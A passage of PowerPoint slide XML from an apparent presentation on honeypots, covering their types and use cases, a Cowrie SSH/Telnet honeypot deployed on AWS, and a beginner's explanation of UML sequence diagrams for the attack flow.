            <a:ext cx="5096589" cy="420529"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3300"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Honeypot Types and Use Cases</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Shape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724733" y="1259086"/>
            <a:ext cx="13180933" cy="807601"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 25000"/>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4" name="Shape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="739973" y="1274326"/>
            <a:ext cx="538401" cy="777121"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 34103"/>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99" y="1561981"/>
            <a:ext cx="201811" cy="201811"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1412915" y="1408867"/>
            <a:ext cx="1731526" cy="210264"/>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DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>What are honeypots?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1412915" y="1699855"/>
            <a:ext cx="12342971" cy="215384"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Decoy systems designed to attract and analyze attackers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724733" y="2201228"/>
            <a:ext cx="13180933" cy="1330762"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 15172"/>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9" name="Shape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="739973" y="2216468"/>
            <a:ext cx="538401" cy="1300282"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 34103"/>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399" y="2765703"/>
            <a:ext cx="201811" cy="201811"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1412915" y="2351008"/>
            <a:ext cx="2115383" cy="210264"/>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DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Types by interaction level:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1412915" y="2641997"/>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Low-interaction: Simulate services (faster, safer, less realistic)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1412915" y="2904411"/>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Medium-interaction: Emulate operating systems (balanced approach)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1412915" y="3166824"/>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High-interaction: Real systems with monitoring (most realistic, highest risk)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Shape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724733" y="3666530"/>
            <a:ext cx="13180933" cy="1330762"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 15172"/>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16" name="Shape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="739973" y="3681770"/>
            <a:ext cx="538401" cy="1300282"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 34103"/>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4399" y="4231005"/>
            <a:ext cx="201811" cy="201811"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1412915" y="3816310"/>
            <a:ext cx="1789867" cy="210264"/>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DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Types by deployment:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1412915" y="4107299"/>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Production honeypots: Detect internal threats and lateral movement</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1412915" y="4369713"/>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Research honeypots: Study attack techniques and malware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1412915" y="4632127"/>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Client honeypots: Detect malicious websites and downloads</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Shape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724733" y="5131832"/>
            <a:ext cx="13180933" cy="1593175"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12673"/>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23" name="Shape 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="739973" y="5147072"/>
            <a:ext cx="538401" cy="1562695"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 34103"/>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399" y="5827514"/>
            <a:ext cx="201811" cy="201811"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1412915" y="5281613"/>
            <a:ext cx="1682472" cy="210264"/>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DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Common use cases:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Text 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1412915" y="5572601"/>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Early warning system for new attack campaigns</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1412915" y="5835015"/>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Threat intelligence collection and analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1412915" y="6097429"/>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Distraction and time-wasting for attackers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1412915" y="6359843"/>
            <a:ext cx="12342971" cy="215384"/>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EFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Legal evidence collection for prosecution</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Shape 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724733" y="6859548"/>
            <a:ext cx="13180933" cy="807601"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 25000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="030303"/>
          </a:solidFill>
          <a:ln w="15240">
            <a:solidFill>
              <a:srgbClr val="3B3B3B"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="11430" dir="2700000" algn="bl" rotWithShape="0">
              <a:srgbClr val="3B3B3B">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Shape 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="739973" y="6874788"/>
            <a:ext cx="538401" cy="777121"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 34103"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="222222"/>
          </a:solidFill>
          <a:ln/>
          <a:effectLst>
            <a:outerShdw dist="11430" dir="2700000" algn="bl" rotWithShape="0">
              <a:srgbClr val="3B3B3B">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32"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399" y="7162443"/>
            <a:ext cx="201811" cy="201811"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1412915" y="7009328"/>
            <a:ext cx="1682472" cy="210264"/>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DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Our implementation:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1412915" y="7300317"/>
            <a:ext cx="12342971" cy="215384"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Medium-interaction research honeypot using Cowrie for SSH/Telnet emulation, deployed on AWS for scalability and isolation</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5271135" cy="230386"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Attack Flow: A Beginner's Guide to UML Sequence Diagrams</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="396835" y="689610"/>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FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>UML (Unified Modeling Language) diagrams are visual blueprints for software systems. They help us understand how different parts of a system interact. A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="550" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Sequence Diagram</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="550" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> is a type of UML diagram that shows the order of interactions between objects or processes over time. Think of it like a script for a play, where each character (or system component) has a lifeline, and messages are sent back and forth in chronological order.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="396835" y="1008221"/>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FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>To read a sequence diagram:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="396835" y="1208961"/>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FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Participants:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="550" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> These are the actors or system components, represented at the top of the diagram.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="396835" y="1352550"/>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FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Lifelines:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="550" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> Vertical dashed lines extend down from each participant, representing their existence over time.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="396835" y="1496139"/>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FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Messages:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="550" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> Horizontal arrows between lifelines show communication. The direction of the arrow indicates the sender and receiver.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="396835" y="1639729"/>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FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Activation Bars:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="550" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> Rectangles on lifelines indicate when a participant is active or performing an action.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="396835" y="1840468"/>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FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Below is a sequence diagram illustrating a typical attack flow on our Cowrie honeypot:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Image 0" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6113721" y="1067157"/>
            <a:ext cx="5465952" cy="6803945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6291382" y="2107525"/>
            <a:ext cx="7949684" cy="117872"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="900"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="396835" y="10947559"/>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FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>This diagram clearly shows the steps an attacker takes, how our Cowrie honeypot responds, and importantly, how all interactions are logged for analysis.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="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7830" y="579715"/>
            <a:ext cx="7669411" cy="526971"/>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DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Simulated Filesystem: Attacker's View</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="737830" y="1443990"/>
            <a:ext cx="13154739" cy="539829"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
